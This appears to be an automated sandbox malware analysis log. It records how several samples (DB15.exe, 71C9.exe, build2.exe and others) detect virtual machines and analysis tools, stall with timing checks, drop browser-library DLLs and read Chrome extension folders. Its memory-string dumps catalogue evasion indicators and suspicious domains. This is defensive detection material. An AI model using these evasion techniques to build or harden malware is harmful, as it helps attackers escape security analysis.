Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: Yara match File source: Process Memory Space: build2.exe PID: 728, type: MEMORYSTR
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\gtdirat Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\gtdirat Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\gtdirat Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\gtdirat Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\gtdirat Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\gtdirat Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A0B.exe System information queried: FirmwareTableInformation
Source: C:\Windows\explorer.exe System information queried: FirmwareTableInformation
Source: 71C9.exe, 0000001D.00000002.3185463938.0000000003190000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000003.3083456233.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000002.3174783125.0000000000400000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: RTP.EXESYSTEMROOT=SETFILETIMESIGNWRITINGSOFT_DOTTEDSYSTEMDRIVETTL EXPIREDUNINSTALLERVBOXSERVICEVMUSRVC.EXEVARIANTINITVIRTUALFREEVIRTUALLOCKWSARECVFROMWARANG_CITIWHITE_SPACEWINDEFENDER[:^XDIGIT:]\DSEFIX.EXEADDITIONALSALARM CLOCKAPPLICATIONASSISTQUEUEAUTHORITIESBAD ADDRESSBAD ARGSIZEBAD M VALUEBAD MESSAGEBAD TIMEDIVBITCOINS.SKBROKEN PIPECAMPAIGN_IDCGOCALL NILCLOBBERFREECLOSESOCKETCOMBASE.DLLCREATED BY CRYPT32.DLLE2.KEFF.ORGEMBEDDED/%SEXTERNAL IPFILE EXISTSFINAL TOKENFLOAT32NAN2FLOAT64NAN1FLOAT64NAN2FLOAT64NAN3GCCHECKMARKGENERALIZEDGET CDN: %WGETPEERNAMEGETSOCKNAMEGLOBALALLOCHTTP2CLIENTHTTP2SERVERHTTPS_PROXYI/O TIMEOUTLOCAL ERRORMSPANMANUALMETHODARGS(MINTRIGGER=MOVE %S: %WMSWSOCK.DLLNETPOLLINITNEXT SERVERNIL CONTEXTOPERA-PROXYORANNIS.COMOUT OF SYNCPARSE ERRORPROCESS: %SREFLECT.SETREFLECTOFFSRETRY-AFTERRUNTIME: P RUNTIME: G RUNTIME: P SCHEDDETAILSECHOST.DLLSECUR32.DLLSERVICE: %SSHELL32.DLLSHORT WRITESTACK TRACESTART PROXYTASKMGR.EXETLS: ALERT(TRACEALLOC(TRAFFIC UPDUNREACHABLEUSERENV.DLLVERSION.DLLVERSION=195WININET.DLLWUP_PROCESS (SENSITIVE) B (
Source: A0B.exe, 00000017.00000002.3117907227.00000000000F3000.00000020.00000001.01000000.0000000A.sdmp Binary or memory string: SBIEDLL.DLL
Source: 71C9.exe, 0000001D.00000002.3185463938.0000000003190000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000003.3083456233.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000002.3174783125.0000000000400000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: TOO MANY LINKSTOO MANY USERSTORRC FILENAMEUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERUSERARENASTATEVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WINDOW CREATEDWORK.FULL != 0XENSERVICE.EXEZERO PARAMETER WITH GC PROG
Source: build2.exe, 00000029.00000002.3568020251.0000000000400000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: AAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL
Source: 71C9.exe, 0000001D.00000002.3185463938.0000000003190000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000003.3083456233.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000002.3174783125.0000000000400000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: ... OMITTING ACCEPT-CHARSETAFTER EFIGUARDALLOCFREETRACEBAD ALLOCCOUNTBAD RECORD MACBAD RESTART PCBAD SPAN STATEBTC.USEBSV.COMCERT INSTALLEDCHECKSUM ERRORCONTENT-LENGTHCOULDN'T PATCHDATA TRUNCATEDDISTRIBUTOR_IDDRIVER REMOVEDERROR RESPONSEFILE TOO LARGEFINALIZER WAITGCSTOPTHEWORLDGET UPTIME: %WGETPROTOBYNAMEGOT SYSTEM PIDINITIAL SERVERINTERNAL ERRORINVALID SYNTAXIS A DIRECTORYKEY SIZE WRONGLEVEL 2 HALTEDLEVEL 3 HALTEDMEMPROFILERATEMULTIPARTFILESNEED MORE DATANIL ELEM TYPE!NO MODULE DATANO SUCH DEVICEOPEN EVENT: %WPARSE CERT: %WPROTOCOL ERRORREAD CERTS: %WREAD_FRAME_EOFREFLECT.VALUE.REMOVE APP: %WRUNTIME: FULL=RUNTIME: WANT=S.ALLOCCOUNT= SEMAROOT QUEUESERVER.VERSIONSTACK OVERFLOWSTART TASK: %WSTOPM SPINNINGSTORE64 FAILEDSYNC.COND.WAITTEXT FILE BUSYTIME.LOCATION(TIMEENDPERIODTOO MANY LINKSTOO MANY USERSTORRC FILENAMEUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERUSERARENASTATEVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WINDOW CREATEDWORK.FULL != 0XENSERVICE.EXEZERO PARAMETER WITH GC PROG
Source: C:\Users\user\AppData\Local\Temp\A0B.exe RDTSC instruction interceptor: First address: 5109D9 second address: 510A01 instructions: 0x00000000 rdtsc 0x00000002 sbb dx, bp 0x00000005 xor cl, FFFFFFA0h 0x00000008 dec dl 0x0000000a sbb dx, 7C4Eh 0x0000000f add cl, 00000054h 0x00000012 stc 0x00000013 movzx dx, dh 0x00000017 ror cl, 1 0x00000019 neg cl 0x0000001b btc ax, dx 0x0000001f xor bl, cl 0x00000021 rcr ah, cl 0x00000023 push edi 0x00000024 clc 0x00000025 shr ax, cl 0x00000028 rdtsc
Source: C:\Users\user\AppData\Local\Temp\A0B.exe RDTSC instruction interceptor: First address: 1C6B84 second address: 1C6B8B instructions: 0x00000000 rdtsc 0x00000002 not ebp 0x00000004 pop ebx 0x00000005 cwd 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\A0B.exe RDTSC instruction interceptor: First address: 41C111 second address: 41C11C instructions: 0x00000000 rdtsc 0x00000002 movzx dx, dh 0x00000006 movsx dx, dl 0x0000000a pop ebp 0x0000000b rdtsc
Source: C:\Windows\explorer.exe File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 11_2_027D171C rdtsc 11_2_027D171C
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_00481920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,GetTickCount,Heap32ListFirst,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,GetTickCount,Process32First,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId, 17_2_00481920
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free, 12_2_0040E670
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free, 17_2_0040E670
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Thread delayed: delay time: 700000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 434 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 3208 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 766 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 365 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 1457 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 870 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 877 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 787
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 719
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4820
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\nss3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\sqlm[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Windows\explorer.exe TID: 4080 Thread sleep time: -320800s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 3524 Thread sleep time: -76600s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 7000 Thread sleep time: -36500s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 5792 Thread sleep time: -32000s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 4080 Thread sleep time: -145700s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe TID: 6368 Thread sleep time: -700000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\A0B.exe TID: 4996 Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\A0B.exe TID: 4996 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1912 Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4780 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\71C9.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose, 12_2_00410160
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose, 12_2_0040F730
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose, 12_2_0040FB98
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose, 17_2_0040F730
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_00410160 Sleep,PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose, 17_2_00410160
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose, 17_2_0040FB98
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Thread delayed: delay time: 700000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: explorer.exe, 00000002.00000000.2110113315.000000000962B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWystem32\DriverStore\en-US\msmouse.inf_locv
Source: 71C9.exe, 0000001D.00000002.3185463938.0000000003190000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000003.3083456233.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000002.3174783125.0000000000400000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: DnsRecordListFreeENHANCE_YOUR_CALMEnumThreadWindowsFLE Standard TimeFailed DependencyGC assist markingGMT Standard TimeGTB Standard TimeGetCurrentProcessGetShortPathNameWHEADER_TABLE_SIZEHKEY_CLASSES_ROOTHKEY_CURRENT_USERHTTP_1_1_REQUIREDIf-Modified-SinceIsTokenRestrictedLookupAccountSidWMESSAGE-INTEGRITYMoved PermanentlyOld_North_ArabianOld_South_ArabianOther_ID_ContinuePython-urllib/2.5QueryWorkingSetExRESERVATION-TOKENReadProcessMemoryRegLoadMUIStringWRtlGetCurrentPebSafeArrayCopyDataSafeArrayCreateExSentence_TerminalSysAllocStringLenSystemFunction036Too Many RequestsTransfer-EncodingUnexpected escapeUnified_IdeographUnknown AttributeVGAuthService.exeWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseWrong CredentialsX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDN
Source: 71C9.exe, 0000001D.00000002.3174783125.0000000000400000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: IP addressIsValidSidKeep-AliveKharoshthiLocalAllocLockFileExLogonUserWManichaeanMessage-IdNo ContentOld_ItalicOld_PermicOld_TurkicOpenEventWOpenMutexWOpenThreadOther_MathPOSTALCODEParseAddr(ParseFloatPhoenicianProcessingPulseEventRIPEMD-160RST_STREAMResetEventSHA256-RSASHA384-RSASHA512-RSASYSTEMROOTSaurashtraSecureBootSet-CookieShowWindowTor uptimeUser-AgentVMSrvc.exeWSACleanupWSASocketWWSAStartupWget/1.9.1Windows 10Windows 11[:^alnum:][:^alpha:][:^ascii:][:^blank:][:^cntrl:][:^digit:][:^graph:][:^lower:][:^print:][:^punct:][:^space:][:^upper:][:xdigit:]\\.\WinMon\patch.exe^{[\w-]+}$app_%d.txtatomicand8attr%d=%s cmd is nilcomplex128connectiondebug calldnsapi.dlldsefix.exedwmapi.dlle.keff.orgexecerrdotexitThreadexp masterfloat32nanfloat64nangetsockoptgoroutine http_proxyimage/avifimage/jpegimage/webpimpossibleindicationinvalid IPinvalidptrkeep-alivemSpanInUsemyhostnameno resultsnot a boolnot signednotifyListowner diedpowershellprl_cc.exeprofInsertres binderres masterresumptionrune <nil>runtime: gs.state = schedtracesemacquiresend stateset-cookiesetsockoptskipping: socks bindstackLarget.Kind == terminatedtext/plaintime.Date(time.Localtracefree(tracegc()
Source: 71C9.exe, 0000001D.00000002.3174783125.0000000000400000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: acceptactivechan<-closedcookiedirectdomainefenceempty exec: expectfamilygeoip6gopherhangupheaderinternip+netkilledlistenminutenetdnsnumberobjectoriginpopcntrdtscpreadatreasonremoverenamereturnrun-v3rune1 secondselectsendtoserversocketsocks socks5statusstringstructsweep sysmontelnettimersuint16uint32uint64unuseduptimevmhgfsvmxnetvpc-s3wup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Value> allocs dying= flags= len=%d locks= m->g0= nmsys= pad1= pad2= s=nil
Source: 71C9.exe, 0000001D.00000002.3174783125.0000000000400000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: (MISSING)(unknown), newval=, oldval=, size = , tail = -07:00:00/api/cdn?/api/poll127.0.0.1244140625: status=AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriticEVEN-PORTExecQueryFindCloseForbiddenGetDIBitsHex_DigitInheritedInstMatchInstRune1InterfaceKhudawadiLocalFreeMalayalamMongolianMoveFileWNabataeanNot FoundOP_RETURNOSCaptionPalmyreneParseUintPatchTimePublisherReleaseDCRemoveAllSTUN addrSamaritanSee OtherSeptemberSundaneseSysnativeToo EarlyTrailer: TypeCNAMETypeHINFOTypeMINFOUse ProxyVBoxGuestVBoxMouseVBoxVideoWSASendToWednesdayWindows 7WriteFileZ07:00:00[%v = %d][:^word:][:alnum:][:alpha:][:ascii:][:blank:][:cntrl:][:digit:][:graph:][:lower:][:print:][:punct:][:space:][:upper:]_outboundatomicor8attributeb.ooze.ccbad indirbus errorchallengechan sendcomplex64connectexcopystackcsrss.exectxt != 0d.nx != 0dns,filesecdsa.netempty urlfiles,dnsfn.48.orgfodhelperfork/execfuncargs(gdi32.dllhchanLeafimage/gifimage/pnginittraceinterfaceinterruptinvalid nipv6-icmplocalhostmSpanDeadnew tokennil errorntdll.dllole32.dllomitemptyop_returnpanicwaitpatch.exepclmulqdqpreemptedprintableprofBlockprotocol 